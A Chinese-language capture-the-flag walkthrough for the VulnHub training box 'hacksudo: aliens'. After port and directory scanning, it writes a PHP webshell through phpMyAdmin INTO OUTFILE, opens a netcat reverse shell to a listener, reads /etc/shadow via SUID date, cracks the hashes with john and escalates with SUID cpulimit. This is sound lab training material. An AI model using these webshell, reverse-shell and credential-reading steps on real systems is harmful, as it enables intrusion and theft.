vulnhub靶场hacksudo: aliens

0x000 靶场描述

---

The box was created with Virtualbox ,but it should work with VMWare Player and VMWare workstation Upon booting up use netdiscover tool to find IP address. This is the target address based on whatever settings you have. You should verify the address just incase.

Find the user.txt and root.txt flag submit it to the mybox channel on Discord and get chance to get hacksudo machine hacking course free .

---

0x001 靶场下载

---

https://www.vulnhub.com/entry/hacksudo-aliens,676/

---

0x002 信息收集

---

探测存活主机

netdiscover -r 192.168.1.0/24

端口扫描

nmap -sS -sV -A -p 1-65535 192.168.1.105

22     ssh
80     http
9000   http

访问80端口，没找到可用信息，访问9000端口看看是什么

发现是phpmyadmin页面，尝试弱口令无果。。。

目录扫描

扫描到备份目录，访问发现存在数据库的备份文件，点击下载

gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

存在数据库账号密码

user="vishal"
password="hacksudo"

---

0x003 mysql写入文件getshell

---

登陆phpmyadmin

经过测试，发现可以写入一句话木马

select "<?php system($_REQUEST[cmd]);?>" into outfile "/var/www/html/1.php"

执行?cmd=nc 192.168.1.108 9999 -e /bin/bash监听到shell

python -c 'import pty; pty.spawn("/bin/bash")' #切换shell

---

0x004 提权

---

查找具有suid权限的文件，发现date

find / -perm -u=s -exec ls -al {} \; 2>/dev/null

执行data查看/etc/shadow密码文件

/usr/bin/date -f /etc/shadow

john破解密码

将查看到你用户及密文复制到passwd.txt文件中

john passwd.txt

ssh远程登陆

cpulimit提权

再次查找一下具有suid权限的文件，发现存在cpulimit。

./cpulimit =l 100 -f -- /bin/sh -p

详细用法：https://gtfobins.github.io/

---

0x005 flag

---